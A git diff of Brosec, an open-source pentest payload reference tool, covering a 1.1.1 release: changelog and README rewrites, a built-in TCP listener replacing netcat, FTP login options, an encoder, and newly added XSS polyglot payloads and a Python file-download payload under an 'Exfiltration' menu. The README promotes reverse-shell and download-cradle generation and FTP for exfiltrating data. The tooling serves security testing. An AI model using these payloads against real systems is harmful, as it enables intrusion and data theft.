diff --git a/.gitignore b/.gitignore
index 105265f..9c243fb 100644
--- a/.gitignore
+++ b/.gitignore
@@ -26,4 +26,3 @@ build/Release
# https://www.npmjs.org/doc/misc/npm-faq.html#should-i-check-my-node_modules-folder-into-git
node_modules
bros.db
-settings.js
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7fca998..f810acf 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,13 +1,31 @@
# ChangeLog
-## 0.2b _(Feb 16, 2016)_
+## Major Release 1.1.1 _(July 30, 2016)_
+
+- Features
+ - Full Windows Support added
+ - Better documentation added to the new [wiki](https://github.com/gabemarshall/Brosec/wiki)
+ - Simplified install process. Once you have nodejs installed just run ```npm install -g Brosec```
+ - ```bros encode``` module added (realtime encoder/decoder)
+ - ```bros ftp``` now supports auth via ```--username``` and ```--password``` parameters.
+ - New SQLi Polyglots added to ```bros 43```
+ - New XSS payloads ```bros 42```
+ - (```bros 424``` Credit to [@0xsobky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot))
+- Dependencies
+ - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) -- this greatly reduces the complexity of Brosec and makes it easier to install.
+
+
+- Bug fixes
+ - Lots and lots of bug fixes...and probably new bugs introduced ;p
+
+## 1.0.2b _(Feb 16, 2016)_
- Features
- `bros update`
- Convenience module that check for updates via git, pull if any updates are found, and installs any new dependencies.
-## 0.2a _(Feb 15, 2016)_
+## 1.0.2a _(Feb 15, 2016)_
- Features
- `bros clean`
@@ -15,7 +33,7 @@
- Minor performance improvements throughout Brosec
-## 0.2 _(Feb 5, 2016)_
+## 1.0.2 _(Feb 5, 2016)_
- Features
- `bros ftp`
diff --git a/README.md b/README.md
index ea58de7..a92a529 100644
--- a/README.md
+++ b/README.md
@@ -6,95 +6,69 @@ Overview (tl;dr)
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.
-Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...
+Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as...
[](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg)
-#### Payload Variables
+Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so.
-Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.
+[](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc)
-For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).
-[](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc)
+##### Additional Features and Usage Examples
-##### Available variables
-- LHOST : Local IP or name
-- LPORT : Local IP or name
-- RHOST : Remote IP or name
-- RPORT : Remote IP or name
-- USER : Username (only used in a few payloads)
-- PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)
+###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http)
+Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered.
+
+
+###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp)
+Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).
-
- Above are multiple examples of how to access and set the stored configuration variables.
-- Configuration variables can be viewed via the `config` command at any time, or by entering the variable name
-- Variables can be changed at any time by entering `set `
-- You can also navigate to frequently used payloads by entering the menu sequence from the command line: `bros `
- - Ex: `bros 413` - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload
-
+###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode)
-
-##### Additional Features and Usage Examples
-###### XXE for Bros
-
-
-In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.
-
+A realtime encoder/decoder utility designed with web pentesters in mind that often find the need to encode and decode various payloads.
+
+
+
+
+Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki).
-###### Simple HTTP(s) Server
-Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered.
-
-
-###### Anonymous FTP Server
-Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).
Installation
============
### [Releases](https://github.com/gabemarshall/Brosec/releases)
-*Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec*
-### Manual installation
+### Mac
+
+#### Quick Installation
-#### Mac
+- `brew install node` - Install Nodejs (or download installer from https://nodejs.org/en/download/)
+- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin)
-- `brew install node netcat` - Install Nodejs and netcat (nc or ncat will work too)
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-- `cd Brosec && npm install` - cd into the directory and install npm depdendencies
#### Kali Linux
-- `apt-get install npm build-essential g++ xsel netcat` Install dependencies
-- `npm config set registry http://registry.npmjs.org/` Npm registry seems to be broken by default when installed from Kali repos
+- `apt-get install npm build-essential g++ xsel` Install dependencies
- `npm install -g n` Install n (nodejs version manager)
-- `n latest` Install latest version of nodejs
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-- `cd Brosec && npm install` - cd into the directory and install npm depdendencies
-
-### Windows (Unsupported)
+ - If the above fails, try - `npm config set registry http://registry.npmjs.org/`
-- Install [nodejs](https://nodejs.org/download)
-- Install [ncat](https://nmap.org/download.html)
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-
-Payloads that utilize netcat will not work due to the kexec library not being supported in Windows
+- `n latest` Install latest version of nodejs
+- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin)
-#### Optional
-Add bros directory path to your PATH env variable, create a symlink for the bros file, etc
+### Windows (Unsupported)
-Configuration
-=====================
+- Install via official installer [nodejs](https://nodejs.org/download)
+- `npm install -g Brosec` - Install Brosec
-Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).
Swag
@@ -114,5 +88,6 @@ Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In additi
- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)
+- [SecLists](https://github.com/danielmiessler/SecLists)
Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor)
diff --git a/bros b/bros
index 644de67..1f78909 100755
--- a/bros
+++ b/bros
@@ -3,13 +3,14 @@
var argv = require('yargs').argv,
log = require('cli-color'),
db = require('./db/db'),
+ os = require('os'),
menu = require('./modules/menu'),
secondaryMenu = require("./modules/secondaryMenu"),
check = require('./modules/inputChecks'),
simpleWeb = require('./modules/webserver/simple.js'),
simpleFtp = require('./modules/webserver/simpleFtp.js'),
interfaces = require('./modules/interfaces'),
- settings = require('./settings'),
+ settings = require('./modules/settings'),
child_process = require('child_process'),
utilities = require('./modules/utilities'),
log = require('./modules/log.js');
@@ -18,11 +19,6 @@ var firstArgument = argv._[0];
var secondArgument = argv._[1];
var thirdArgument = argv._[2];
-
-
-
-
-
function getFirstArgValue(arg) {
switch (arg) {
case 1:
@@ -42,7 +38,7 @@ function getFirstArgValue(arg) {
}
function parseArgs() {
-
+ var oldSecondary;
if (firstArgument >= 1 && firstArgument <= 6) {
secondaryMenu = getFirstArgValue(firstArgument);
@@ -75,6 +71,7 @@ function parseArgs() {
} else if (typeof(firstArgument) === "string") {
firstArgument = firstArgument.toUpperCase();
try {
+ oldSecondary = secondArgument;
secondArgument = secondArgument.toUpperCase();
} catch(err){
@@ -92,6 +89,13 @@ function parseArgs() {
//simpleFtp.ftps(argv);
} else if (firstArgument === "UPDATE"){
utilities.update();
+ } else if (firstArgument === "ENCODE"){
+ if (secondArgument){
+ utilities.encoder(oldSecondary);
+ } else {
+ utilities.encoder();
+ }
+
} else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){
interfaces.setlhost();
@@ -101,10 +105,20 @@ function parseArgs() {
} else if (firstArgument === "HELP") {
check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu);
} else if (firstArgument === "CLEAN") {
- child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){
+
+ var currentOS = os.type();
+ var cmd = "rm";
+ var dir = settings.dbPath;
+ if (currentOS.match("Windows")){
+ cmd = "del";
+ } else {
+
+ }
+
+ child_process.execFile(cmd, [dir], function(error, stdout, stderr){
});
console.log("The Brosec database located at %s has been wiped.", settings.dbPath)
- }
+ }
else {
check.allInputChecks(firstArgument, console.log, console.log)
}
diff --git a/db/db.js b/db/db.js
index 820b5ac..2aa0a85 100644
--- a/db/db.js
+++ b/db/db.js
@@ -1,10 +1,10 @@
var dirty = require('dirty');
-var settings = require('../settings.js')
-
+var settings = require('../modules/settings.js');
+var os = require('os');
// By default, brosec stores its data file in /var/tmp
// Change storage location by altering settings.js
try {
- var db = dirty(settings.dbPath);
+ var db = dirty(settings.dbPath);
}
catch (err){
console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.")
@@ -19,7 +19,7 @@ exports.new = function(title, description){
}
exports.newConfig = function(key, val){
- var keyExists = false
+ var keyExists = false
db.forEach(function(keyStore, valStore) {
if (key === keyStore){
keyExists = true
@@ -33,7 +33,7 @@ exports.newConfig = function(key, val){
}
else {
db.set(key, val)
- }
+ }
db.on('drain', function() {
});
}
@@ -52,11 +52,10 @@ function getConfig(value){
}
// If none exist
else {
-
+
}
});
return test
}
exports.getConfig = getConfig;
-
diff --git a/modules/checkModule.js b/modules/checkModule.js
deleted file mode 100644
index 7ddf620..0000000
--- a/modules/checkModule.js
+++ /dev/null
@@ -1,8 +0,0 @@
-exports.kexec = function(){
- try {
- var kexec = require('kexec');
- return true
- } catch (err){
- return false;
- }
-}
diff --git a/modules/colorize.js b/modules/colorize.js
index 0079c24..ce0193d 100644
--- a/modules/colorize.js
+++ b/modules/colorize.js
@@ -2,7 +2,7 @@ var log = require('cli-color');
exports.samples = function(sample){
- var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/)
+ var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/gi)
var doesSampleContainRemote = sample.match(/((<(RHOST)\s*?.*?>))/)
var doesSampleContainRemotePort = sample.match(/((<(RPORT)\s*?.*?>))/)
var doesSampleContainLocal = sample.match(/((<(LHOST)\s*?.*?>))/)
@@ -10,14 +10,31 @@ exports.samples = function(sample){
var doesSampleContainUser = sample.match(/((<(USER)\s*?.*?>))/)
var doesSampleContainPath = sample.match(/((<(PATH)\s*?.*?>))/)
- function addSomeColor(val, color){
- var temp = sample.split(val[0])
- var final = temp[0]+color(val[0])+temp[1]
+ function replaceAll(str, find, replace) {
+ return str.replace(new RegExp(find, 'g'), replace);
+ }
+
+ function addSomeColor(val, color, debug){
+
+ if (val.length > 1){
+ for (b=0;b))/gi, userResponse)
- //payload = payload.replace(/(\\)/gi,"@@")
+ var t = JSON.parse(userResponse)
+ if (t.length > 1){
+ for (i=0;i))/i, t["+i+"])");
+ }
+ } else {
+ payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, t[0]);
+ }
+
} else {
tmenu()
return
@@ -70,7 +58,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call
payload = payload.replace(/((<(USER)\s*?.*?>))/gi, user)
payload = payload.replace(/((<(PATH)\s*?.*?>))/gi, path)
- payload = payload.replace(/(')/gi, "\\'")
if(payload.match(/undefined/)){
warn()
return false;
diff --git a/modules/questionUser.js b/modules/questionUser.js
index 6b5c145..7d1fa9e 100644
--- a/modules/questionUser.js
+++ b/modules/questionUser.js
@@ -2,15 +2,11 @@ var prompt = require('prompt'),
os = require('os'),
log = require('cli-color'),
web = require("./webserver/webserver.js"),
- settings = require('../settings.js'),
+ settings = require('./settings.js'),
db = require('../db/db'),
currentOS = os.type(),
- checkModule = require('./checkModule.js'),
- finalAnswer
-
-if (checkModule.kexec()) {
- var kexec = require('kexec');
-}
+ netcat = require('./nc'),
+ finalAnswer = [];
exports.http = function(callback) {
prompt.message = "Should I fire up a web server for you? (Y/n) :"
@@ -36,8 +32,12 @@ exports.http = function(callback) {
exports.ncat = function(callback) {
var port = db.getConfig("LPORT")
- if (kexec){
- prompt.message = "Should I start a netcat listener for you? (Y/n) :"
+ if (!port){
+ console.log(log.red("[!] Missing required variable LPORT"));
+ console.log("Have you tried the "+log.green("help")+" command?");
+ return false;
+ }
+ prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :"
prompt.get([{
name: '_',
description: ":"
@@ -46,9 +46,9 @@ exports.ncat = function(callback) {
try {
result._ = result._.toUpperCase()
if (result._ === "Y" || !result._) {
- console.log(log.blackBright("\n[*] Initializing hacking sequence (" + settings.netcat + " -lnp " + port + " -vv)"));
callback(finalAnswer);
- kexec(settings.netcat + " -lnp " + port + " -vv");
+ console.log(log.blackBright("\n[*] TCP socket server listening on port " + port));
+ netcat.listen(port);
} else {
callback(finalAnswer);
}
@@ -57,20 +57,20 @@ exports.ncat = function(callback) {
}
})
- } else {
- console.log("");
- console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " -vv"));
- callback(finalAnswer);
- }
+
}
exports.ncatReceiveFile = function(callback) {
var port = db.getConfig("LPORT");
- var path = db.getConfig("PATH");
+ if (!port){
+ console.log(log.red("[!] Missing required variable LPORT"));
+ console.log("Have you tried the "+log.green("help")+" command?");
+ return false;
+ }
+ var path = process.cwd()+"/";
var localFile = finalAnswer.replace(/(\/)/g, "_")
- if (!kexec){
- prompt.message = "Should I start a netcat listener for you? (Y/n) :"
+ prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :"
prompt.get([{
name: '_',
description: ":"
@@ -80,17 +80,10 @@ exports.ncatReceiveFile = function(callback) {
result._ = result._.toUpperCase()
if (result._ === "Y" || !result._) {
-
- if (!path || path.length <= 0) {
- log.yellow("Warning: Path variable is not set, defaulting to /var/tmp/")
- }
- path = "/var/tmp/"
-
- // if kexec isn't installed, notify the user
callback(finalAnswer);
+ console.log(log.blackBright("\n[*] TCP socket server listening on port " + port + " (File will be saved as "+path+localFile+")\n"));
- console.log(log.blackBright("\n[*] Initializing hacking sequence (File will be saved as " + path + "/bros" + localFile + ")\n"))
- kexec(settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile + " -vv");
+ netcat.receiveFile(port, path, localFile);
} else {
callback(finalAnswer);
@@ -100,11 +93,6 @@ exports.ncatReceiveFile = function(callback) {
}
})
- } else {
- callback(finalAnswer);
- console.log("");
- console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile));
- }
}
exports.some = function(question, callback, type) {
@@ -125,7 +113,7 @@ exports.some = function(question, callback, type) {
if (err) {
console.log(err);
} else {
- finalAnswer = result._;
+ finalAnswer.push(result._);
temp += 1;
}
@@ -150,6 +138,7 @@ exports.some = function(question, callback, type) {
clearInterval(checkStatus);
// If the last question is a string, send output to final parsing
if (typeof(question[temp - 1]) === "string") {
+ finalAnswer = JSON.stringify(finalAnswer);
callback(finalAnswer);
}
}
diff --git a/modules/secondaryMenu.js b/modules/secondaryMenu.js
index 721d252..1f6702d 100644
--- a/modules/secondaryMenu.js
+++ b/modules/secondaryMenu.js
@@ -175,7 +175,7 @@ var Menu = function(title, menuOptions, payloadType) {
var menus = {}
var infoGMenu = new Menu("--[ Information Gathering ]--", ["DNS", "Port Scanning", "SMB", "SNMP"], pay.infog);
-var webMenu = new Menu("--[ Web ]--",["XML", "SQLi"], pay.web)
+var webMenu = new Menu("--[ Web ]--",["XML", "XSS", "SQLi"], pay.web)
var miscMenu = new Menu('--[ Miscellaneous ]--', ["Reverse Shells", "Exfiltration"], pay.misc)
var linuxMenu = new Menu('--[ Linux ]--', ["System Info", "File System", "Networking", "Stealth", "Privesc"], pay.linux)
var windowsMenu = new Menu('--[ Windows ]--', ["System Info", "File System", "Networking", "WMIC", "Powershell", "Windows Registry"], pay.windows)
diff --git a/modules/settings.js b/modules/settings.js
new file mode 100644
index 0000000..cc78dd6
--- /dev/null
+++ b/modules/settings.js
@@ -0,0 +1,17 @@
+var settings = {},
+ os = require('os');
+
+// ---[Db Storage Path]---
+// Brosec stores variable values using the nodejs dirty module
+
+var currentOS = os.type();
+
+if (currentOS.match("Windows")){
+ settings.dbPath = dirty(os.tmpdir()+"\\bros.db");
+} else {
+ settings.dbPath = '/var/tmp/bros.db'
+}
+
+
+
+module.exports = settings;
diff --git a/modules/utilities.js b/modules/utilities.js
index 6d4f81f..b951072 100644
--- a/modules/utilities.js
+++ b/modules/utilities.js
@@ -1,5 +1,6 @@
var child_process = require('child_process'),
log = require('./log.js'),
+ encoder = require('./encoder'),
brosDir = require.resolve('cli-color');
// Get install path
@@ -24,3 +25,7 @@ exports.update = function(){
})
}
+
+exports.encoder = function(input){
+ encoder.init(input);
+}
\ No newline at end of file
diff --git a/modules/webserver/simpleFtp.js b/modules/webserver/simpleFtp.js
index 68948ac..5a0396a 100644
--- a/modules/webserver/simpleFtp.js
+++ b/modules/webserver/simpleFtp.js
@@ -2,16 +2,19 @@ var ftpd = require('ftpd');
var fs = require('fs');
var path = require('path');
var log = require('../log.js');
-var keyFile;
-var certFile;
-var server;
+var argv = require('yargs').argv;
+var userArg = argv.username;
+var passArg = argv.password;
+var keyFile, certFile, server;
var options = {
host: process.env.IP || '127.0.0.1',
port: process.env.PORT || 7002,
tls: null,
};
+
var startFtpServer = function(protocol){
+ console.log(" [!] WARNING: This ftp server is not intended to be secure and should be used with caution.\n")
if (protocol === "ftps"){
console.log("ftps")
options.tls = {
@@ -44,33 +47,46 @@ var startFtpServer = function(protocol){
var username = null;
console.log('client connected: ' + connection.remoteAddress);
connection.on('command:user', function(user, success, failure) {
- if (user) {
- username = user;
- success();
- } else {
- failure();
- }
+ if (user) {
+ username = user;
+ success();
+ } else {
+ failure();
+ }
});
connection.on('command:pass', function(pass, success, failure) {
- if (pass) {
- success(username);
+ if(!passArg){
+ if (pass) {
+ success(username);
+ } else {
+ failure();
+ }
} else {
- failure();
+ if (pass === passArg){
+ success(username);
+ } else {
+ failure();
+ }
}
});
});
server.debugging = 4;
-
+
ftpPort = options.port
if (!ftpPort){
ftpPort = 2121;
}
-
+
server.listen(ftpPort);
- console.log(" [*] An "+log.status("anonymous")+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)");
+ var ftpType = " anonymous ";
+ if (userArg){
+ ftpType = "";
+ }
+ console.log(" [*] An"+log.status(ftpType)+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)");
+
}
diff --git a/package.json b/package.json
index fae406f..4ab82b7 100644
--- a/package.json
+++ b/package.json
@@ -1,8 +1,8 @@
{
"name": "Brosec",
- "version": "0.0.1a",
+ "version": "1.1.1",
"description": "Brosec - Pentest fu for bros",
- "main": "bros.js",
+ "main": "bros",
"repository": {
"type": "git",
"url": "git://github.com/gabemarshall/Brosec.git"
@@ -10,13 +10,15 @@
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
+ "bin": {
+ "bros": "./bros"
+ },
"dependencies": {
"cli-color": "*",
"cli-table": "*",
"dirty": "*",
"ejs": "^2.3.1",
"express": "*",
- "kexec": "^2.0.2",
"morgan": "*",
"mstring": "*",
"prompt": "*",
@@ -25,10 +27,10 @@
"method-override": "*",
"ecstatic": "*",
"simple-git": "*",
- "ftpd": "*"
- },
- "optionalDependencies":{
- "kexec":"^2.0.2"
+ "ftpd": "*",
+ "blessed": "*",
+ "js-htmlencode": "*",
+ "copy-paste":"*"
},
"author": "Gabe Marshall",
"license": "ISC"
diff --git a/payloads/misc.js b/payloads/misc.js
index 174dcf1..84c66d5 100644
--- a/payloads/misc.js
+++ b/payloads/misc.js
@@ -112,10 +112,11 @@ Load({
Load({
title: "Download File via Python",
- payload:'python -c \'import urllib;urllib.urlretrieve ("http://:/","");\'',
+ payload:'python -c \'import urllib;urllib.urlretrieve ("","");\'',
category: "Exfiltration",
callback: function(bro){
- question("What file would you like to download? (ex: script.sh)");
+ question("What would you like to download? (ex: http://foo.bar/script.sh)");
+ question("Where would you like to save it? (ex: /tmp/script.sh)");
ask.some(questions, bro);
}
})
diff --git a/payloads/web.js b/payloads/web.js
index 8e06499..898333a 100644
--- a/payloads/web.js
+++ b/payloads/web.js
@@ -97,30 +97,62 @@ Load({
category: "XML"
})
+// ####### XSS ##########
+
+Load({ payload: "'';!--\"=&{()}", title: "Test string to see how data is being filtered/escaped.", category: "XSS"})
+Load({ payload: "-->\">'>", title: "XSS Polyglot injecting into HTML", category: "XSS"})
+Load({ payload: "';alert(1)//\';alert(2)//\";alert(3)//\\\";alert(4)//-->\">'>=&{}", title: "XSS Polyglot injecting into JS", category: "XSS"})
+
+// Credit to https://twitter.com/0xsobky
+Load({ payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/